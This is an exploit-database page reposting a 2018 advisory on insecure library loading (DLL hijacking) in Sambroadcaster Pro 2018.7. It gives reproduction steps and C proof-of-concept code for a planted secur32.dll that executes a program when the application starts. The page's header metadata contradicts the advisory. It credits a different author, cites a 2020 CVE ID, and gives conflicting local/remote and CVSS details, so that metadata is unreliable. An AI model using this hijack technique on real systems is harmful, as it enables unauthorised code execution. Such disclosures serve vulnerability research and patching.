Advertisement






Sambroadcaster Pro 2018.7 - Insecure Library Loading Code Execution

CVE Category Price Severity
CVE-2020-14342 CWE-426 $10,000 High
Author Risk Exploitation Type Date
Rafay Baloch High Local 2018-08-12
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 0.125 0.90625

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018080085

Below is a copy:

Sambroadcaster Pro 2018.7 - Insecure Library Loading Code Execution
Document Title:
===============
Sambroadcaster Pro 2018.7 - Insecure Library Loading Code Execution


Product & Service Introduction:
===============================
SAM Broadcaster is an Internet radio broadcasting application from Spacial. The name "SAM" is an acronym for Streaming Audio Manager, which describes the features of the software. 
The software includes features for running an Internet radio station from a single computer.

(Copy of the Vendor Homepage: https://spacial.com/)


Exploitation Technique:
=======================
Remote


Platfom Tested:
===============
Windows 10


Technical Details & Description:
================================
A local Insecure Library Loading vulnerability has been discovered in the official Sambroadcaster Pro 2018.7 software.

The issue allows local attackers to inject code to vulnerable dynamic link libraries to compromise the process 
or to gain higher system access privileges. Thus allows a local attacker to compromise the system process of the
affected software to followup with manipulations. 


Vulnerable Software:
[+] Sambroadcaster Pro


Vulnerable version(s):
[+] 2018.7


Affected Libraries:
[+] secur32.dll


Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
the attacker will be able to take control of a computer and execute in the background a trojan horse or a ransonmware for example.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the local vulnerability ...

1. Compile dll
2. Rename the dynamic link library to secur32.dll
3. Copy secur32.dll to C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe
4. Launch SAMBC.exe
5. Now the calculator executes!


-- PoC Exploit --
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
 
DLLIMPORT void HrCreateConverter() { evil(); }
 
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}


Credits & Authors:
==================
Social:    twitter.com/@ZwX2a
Contact :   [email protected]


[#] Disclaimer: 
=============== 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due 
credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the 
author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.



    Copyright  2018 | ZwX - Security Researcher (Software & web application)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.